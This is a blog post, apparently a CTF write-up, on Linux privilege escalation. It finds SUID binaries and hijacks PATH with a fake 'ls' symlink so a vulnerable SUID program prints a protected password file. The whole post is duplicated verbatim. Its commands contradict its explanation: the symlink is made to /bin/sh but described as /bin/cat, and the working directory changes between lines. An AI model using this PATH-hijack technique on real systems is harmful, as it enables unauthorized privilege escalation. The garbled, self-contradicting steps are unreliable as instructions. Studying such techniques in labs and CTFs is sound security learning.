After my OSCP Lab days are over I decided to do a little research and learn more on Privilege Escalation as it is my weak area.So over some series of blog post I am going to share with you some information of what I have learnt so far. The methods mentioned over here are not my own. This is something what I have learnt by reading articles, blogs and solving CTFs
SUID - Set User ID
The binaries which has suid enabled, runs with elevated privileges. Suppose you are logged in as non root user, but this suid bit enabled binaries can run with root privileges.
How does a SUID Bit enable binary looks like ?
-r-sr-x--- 1 hack-me-bak-cracked hack-me-bak 7160 Aug 11 2015 bak
How to find all the SUID enabled binaries ?
hack-me-bak2@challenge02:~$ find / -perm -u=s 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/mtr
/usr/bin/at
/usr/sbin/uuidd
/usr/sbin/pppd
/challenge/hack-me/bak2/bak2
Can this be used to elevate the privileges ?
Lets have a look at the source code
#include <stdlib.h>
#include <stdio.h>
/* gcc -m32 -o bak bak.c */
int main(void)
{
system("ls /challenge/hack-me/bak/.passwd");
return 0;
}
If I look at the permission of .passwd file , it is
-r--r----- 1 hack-me-bak-cracked hack-me-bak-cracked 14 Feb 8 2012 .passwd
You can see that I dont have any rights to view the file
No I am going to create a directory in temp and create a symbolic link to /bin/cat as ls and then export the PATH to that directory.
hack-me-bak@challenge02:/tmp/hack$ ln -s /bin/sh ls
hack-me-bak@challenge02:/tmp/suid$ export PATH=/tmp/suid
hack-me-bak@challenge02:/tmp/suid$ cd ~
hack-me-bak@challenge02:~$ ./bak
xh9ws32d
What did just happen ?
I created a symbolic link of the /bin/cat and named it as "ls" and then I added the PATH to /tmp/suid. Now when the binary will be executed , it will look for "ls" in the PATH. So my PATH now points to "/tmp/suid". And the "ls" points to /bin/cat
So when the c executable executes the line ls /challenge/hack-me/bak/.passwd, it does the following /bin/cat /challenge/hack-me/bak/.passwd
But as it is a SUID binary, it will run with elevated privileges, so I can read the contents of the .passwd file even if I did not have enough privileges.
SUID - Set User ID
The binaries which has suid enabled, runs with elevated privileges. Suppose you are logged in as non root user, but this suid bit enabled binaries can run with root privileges.
How does a SUID Bit enable binary looks like ?
-r-sr-x--- 1 hack-me-bak-cracked hack-me-bak 7160 Aug 11 2015 bak
How to find all the SUID enabled binaries ?
hack-me-bak2@challenge02:~$ find / -perm -u=s 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/sudoedit
/usr/bin/mtr
/usr/bin/at
/usr/sbin/uuidd
/usr/sbin/pppd
/challenge/hack-me/bak2/bak2
Can this be used to elevate the privileges ?
Lets have a look at the source code
#include <stdlib.h>
#include <stdio.h>
/* gcc -m32 -o bak bak.c */
int main(void)
{
system("ls /challenge/hack-me/bak/.passwd");
return 0;
}
If I look at the permission of .passwd file , it is
-r--r----- 1 hack-me-bak-cracked hack-me-bak-cracked 14 Feb 8 2012 .passwd
You can see that I dont have any rights to view the file
No I am going to create a directory in temp and create a symbolic link to /bin/cat as ls and then export the PATH to that directory.
hack-me-bak@challenge02:/tmp/hack$ ln -s /bin/sh ls
hack-me-bak@challenge02:/tmp/suid$ export PATH=/tmp/suid
hack-me-bak@challenge02:/tmp/suid$ cd ~
hack-me-bak@challenge02:~$ ./bak
xh9ws32d
What did just happen ?
I created a symbolic link of the /bin/cat and named it as "ls" and then I added the PATH to /tmp/suid. Now when the binary will be executed , it will look for "ls" in the PATH. So my PATH now points to "/tmp/suid". And the "ls" points to /bin/cat
So when the c executable executes the line ls /challenge/hack-me/bak/.passwd, it does the following /bin/cat /challenge/hack-me/bak/.passwd
But as it is a SUID binary, it will run with elevated privileges, so I can read the contents of the .passwd file even if I did not have enough privileges.